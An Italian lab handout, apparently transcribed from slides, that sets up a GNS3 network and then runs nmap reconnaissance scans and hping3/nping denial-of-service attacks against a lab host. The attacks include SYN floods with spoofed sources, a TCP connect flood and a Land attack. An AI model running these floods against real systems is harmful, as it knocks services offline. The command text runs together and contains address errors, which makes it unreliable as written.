configurazione cloud interface e collegamento a internet
TRANSCRIPT
Configurazione Cloud Interface e collegamento a Internet
Installare il package tuntap_20150118.pkg per creare le interfacce TAP
Lanciare sempre l’applicazione come superuser:
$ sudo /Applications/GNS3.app/Contents/MacOS/GNS3
Fissare i permessi corretti su MAC OSX
$ sudo chown root /Applications/GNS3.app/Contents/Resources/dynamips*$ sudo chmod 4755 /Applications/GNS3.app/Contents/Resources/dynamips*
Prima di lanciare GNS3 fissare i permessi corretti sulle interfacce TAP. Il comando va ridato a ogni reboot del MAC
$ sudo chown $(id -un):$(id -gn) /dev/tap*
Creare la Cloud e associarla a un’interfaccia TAP (es: /dev/tap0):
Associare l’interfaccia TAP in bridge alla porta ethernet attiva.Va fatto dopo aver creato un’interfaccia bridge e associandovi la ethernet e successivamente l’interfaccia TAP e rifatto gli volta dopo aver fatto ripartire un progetto che contiene un nodo cloud.
$ sudo ifconfig bridge0 create$ sudo ifconfig bridge0 addm en0
$ sudo ifconfig bridge0 addm tap0 up
Riassumendo, dopo aver caricato il progetto, lanciare il blocco di comandi:
sudo chown $(id -un):$(id -gn) /dev/tap*sudo ifconfig bridge0 createsudo ifconfig bridge0 addm en0sudo ifconfig bridge0 addm tap0 up
Il router che si interfaccia a Internet va configurato in modo da assumere automaticamente (via dhcp) un indirizzo IP, assegnare dinamicamente la default route e gestire il NAT verso l’interfaccia TAP
conf tip route 0.0.0.0 0.0.0.0 dhcpint fas 1/1ip addr dhcpno shutexit
access-list 1 permit 10.0.0.0 0.255.255.255access-list 1 permit 172.16.0.0 0.15.255.255access-list 1 permit 192.168.0.0 0.0.255.255
ip nat inside source list 1 interface fa1/1 overload
int fa 1/0 ip nat insideexitint fa 1/1ip nat outsideexit
router rip version 2 network 10.0.0.0 network 172.16.1.0 no auto-summaryexit
wr mem
Configurazione di base routers
R1:
conf tinterface FastEthernet1/0 ip address 192.168.0.1 255.255.255.0 duplex auto speed autoexit interface FastEthernet1/1 ip address 10.0.0.1 255.255.255.224 no ip redirects duplex auto
speed autoexit router rip version 2 network 10.0.0.0 network 192.168.0.0 no auto-summary
exitwr mem
R2:
conf tinterface FastEthernet1/0 ip address 1172.16.1.1 255.255.255.0 duplex auto speed autoexit interface FastEthernet1/1 ip address 10.0.0.2 255.255.255.224 no ip redirects duplex auto speed autoexit router rip version 2 network 10.0.0.0 network 172.16.1.0 no auto-summary
exitwr mem
Configurazione di ciascun nodo Linux TinyCore
Aggiungere i seguenti command al file /opt/bootlocal.sh (eseguiti al boot) su ciascuna macchina:
Alice
sudo ip addr add 192.168.1.2/24 broadcast 192.168.1.255 dev eth0sudo ip route add default via 192.168.1.1sudo echo nameserver 8.8.8.8 > /etc/resolv.conf sudo echo nameserver 8.8.4.4 >> /etc/resolv.conf sudo pkill udhcpc
E’ possibile lavorare con vi oppure usare cut/paste
Bobcat >> /opt/bootlocal.shsudo ip addr add 172.16.1.2/24 broadcast 172.16.1.255 dev eth0sudo ip route add default via 172.16.1.1sudo echo nameserver 8.8.8.8 > /etc/resolv.conf sudo echo nameserver 8.8.4.4 >> /etc/
resolv.conf sudo pkill udhcpc^D
Mallory
cat >> /opt/bootlocal.shsudo ip addr add 10.0.0.4/24 broadcast 10.0.0.255 dev eth0sudo ip route add default via 10.0.0.3sudo echo nameserver 8.8.8.8 > /etc/resolv.conf sudo echo nameserver 8.8.4.4 >> /etc/resolv.conf sudo pkill udhcpc^D
Effettuare il backup della configurazione:
$ filetool.sh -b
Effettuare il reboot:
$ reboot oppure poweroff
Caricamento Estensioni
tce-load -iw nmaptce-load -iw hping2tce-load -iw pythontce-load -iw apache2tce-load -iw inetutilstce-load -iw maketce-load -iw compiletctce-load -iw libpcaptce-load -iw libpcap-devtce-load -iw openssl-1.0.0-dev
in caso di problemi:
Editare /opt/tcemirror inserendo "http://distro.ibiblio.org/tinycorelinux" su una sola linea (senza “”)
Scansioni
Stealth Scan
# nmap -sS 172.16.1.2
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:10 ESTInteresting ports on victimhost (172.16.1.2):Not shown: 1674 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http111/tcp open rpcbind957/tcp open unknown3306/tcp open mysql8888/tcp open sun-answerbookMAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.383 secondsYou have new mail in /var/spool/mail/root
TCP null scan (passa attraverso i firewalls)
# nmap -sN 172.16.1.2
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 19:01 EST
Interesting ports on victimhost (172.16.1.2):Not shown: 1674 closed portsPORT STATE SERVICE22/tcp open|filtered ssh80/tcp open|filtered http111/tcp open|filtered rpcbind957/tcp open|filtered unknown3306/tcp open|filtered mysql8888/tcp open|filtered sun-answerbookMAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 1.584 secondsYou have new mail in /var/spool/mail/root
Portscan via TCP Syn
# nmap -sT 172.16.1.2
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:12 ESTInteresting ports on victimhost (172.16.1.2):Not shown: 1674 closed portsPORT STATE SERVICE22/tcp open ssh
80/tcp open http111/tcp open rpcbind957/tcp open unknown3306/tcp open mysql8888/tcp open sun-answerbookMAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.406 secondsYou have new mail in /var/spool/mail/root
FIN, Null e Xmas Tree Scans [-sF, -sN, -sX]L’esempio fa riferimento a un FIN scan, ma basta cambiare l’opzione per ottenere le altre scansioni.# nmap -sF 172.16.1.2
Starting Nmap 4.01 at 2006-07-06 17:23 BSTInteresting ports on victimhost (172.16.1.2):(The 1668 ports scanned but not shown below are in state: closed)PORT STATE SERVICE21/tcp open|filtered ftp22/tcp open|filtered ssh631/tcp open|filtered ipp6000/tcp open|filtered X11
Nmap finished: 1 IP address (1 host up) scanned in 1.284
Firewall Detection (firewalking)
Determina se è presente un firewall a protezione di un host
# nmap -sA 172.16.1.2
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:27 ESTAll 1680 scanned ports on victimhost (172.16.1.2) are UNfilteredMAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.382 secondsYou have new mail in /var/spool/mail/root
possibile alternativa:
# nmap -PN 172.16.1.2
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:30 ESTInteresting ports on victimhost (172.16.1.2):Not shown: 1674 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http111/tcp open rpcbind957/tcp open unknown
3306/tcp open mysql8888/tcp open sun-answerbookMAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.399 seconds
verifica le versioni dei servizi offerti sulle porte
# nmap -sV 172.16.1.2
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:48 ESTInteresting ports on victimhost (172.16.1.2):Not shown: 1674 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)80/tcp open http Apache httpd 2.2.3 ((CentOS))111/tcp open rpcbind 2 (rpc #100000)957/tcp open status 1 (rpc #100024)3306/tcp open mysql MySQL (unauthorized)
8888/tcp open http lighttpd 1.4.32MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 12.624 seconds
Determina informazioni su Sistema operativo e routers attraversati
With Nmap, you can detect which OS and version is running on the remote host. To enable OS & version detection, script scanning and traceroute, we can use “-A” option with NMAP.# nmap -A 172.16.1.2
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:25 ESTInteresting ports on victimhost (172.16.1.2):Not shown: 1674 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)80/tcp open http Apache httpd 2.2.3 ((CentOS))
111/tcp open rpcbind 2 (rpc #100000)957/tcp open status 1 (rpc #100024)3306/tcp open mysql MySQL (unauthorized)8888/tcp open http lighttpd 1.4.32MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).TCP/IP fingerprint:SInfo(V=4.11%P=i686-redhat-linux-gnu%D=11/11%Tm=52814B66%O=22%C=1%M=080027)TSeq(Class=TR%IPID=Z%TS=1000HZ)T1(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)T2(Resp=N)T3(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Uptime 0.169 days (since Mon Nov 11 12:22:15 2013)
Nmap finished: 1 IP address (1 host up) scanned in 22.271 secondsYou have new mail in /var/spool/mail/root
Uso di scripts per il firewalking:
wget http://nmap.org/svn/scripts/firewalk.nse
#nmap --script=firewalk.nse --traceroute --script-args=firewalk.max-probed-ports=7 172.16.1.2
Attacchi
# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source 172.16.1.2
HPING victimhost (172.16.1.2): S set, 40 headers + 120 data byteshping in flood mode, no replies will be shown
^C--- victimhost hping statistic ---1189112 packets transmitted, 0 packets received, 100% packet lossround-trip min/avg/max = 0.0/0.0/0.0 ms
Opzioni Usate:
-c 100000 = Number of packets to send.-d 120 = Size of each packet that was sent to target machine.-S = I am sending SYN packets only.-w 64 = TCP window size.-p 21 = Destination port (21 being FTP port). You can use any port here.--flood = Sending packets as fast as possible, without taking care to show incoming replies. Flood mode.--rand-source = Using Random Source IP Addresses. You can also use -a or –spoof to hide hostnames. See MAN page below.
victimhost = Destination IP address or target machines IP address. You can also use a website name here. In my case resolves to 127.0.0.1 (as entered in /etc/hosts file)
SYN flood – DoS using HPING3root@kali:~# hping3 -S --flood -V 172.16.1.2using lo, addr: 127.0.0.1, MTU: 65536HPING victimhost (172.16.1.2): S set, 40 headers + 0 data byteshping in flood mode, no replies will be shown^C--- victimhost hping statistic ---746021 packets transmitted, 0 packets received, 100% packet lossround-trip min/avg/max = 0.0/0.0/0.0 msroot@kali:~#
Simple SYN flood with spoofed IP – DoS using HPING3root@kali:~# hping3 -S -P -U --flood -V --rand-source -p 22 172.16.1.2using lo, addr: 172.16.1.2, MTU: 65536HPING victimhost (172.16.1.2): SPU set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown^C--- victimhost hping statistic ---554220 packets transmitted, 0 packets received, 100% packet lossround-trip min/avg/max = 0.0/0.0/0.0 msroot@kali:~#
TCP connect flood – DoS using NPINGroot@kali:~# nping --tcp-connect -rate=90000 -c 900000 -q 172.16.1.2 Starting Nping 0.6.46 ( http://nmap.org/nping ) at 2014-08-21 16:20 EST^CMax rtt: 7.220ms | Min rtt: 0.004ms | Avg rtt: 1.684msTCP connection attempts: 21880 | Successful connections: 5537 | Failed: 16343 (74.69%)Nping done: 1 IP address pinged in 3.09 secondsroot@kali:~#
Land Attack:hping3 -V -c 1000000 -d 120 -S -w 64 -p 22 -s 22 --flood -a 172.16.1.2 172.16.1.2• --flood: sent packets as fast as possible.
Don't show replies.• --rand-dest: random destionation address
mode. see the man.• -V <-- Verbose• -c --count: packet count• -d --data: data size• -S --syn: set SYN flag• -w --win: winsize (default 64)• -p --destport [+][+]<port> destination
port(default 0) ctrl+z inc/dec• -s --baseport: base source port (default
random)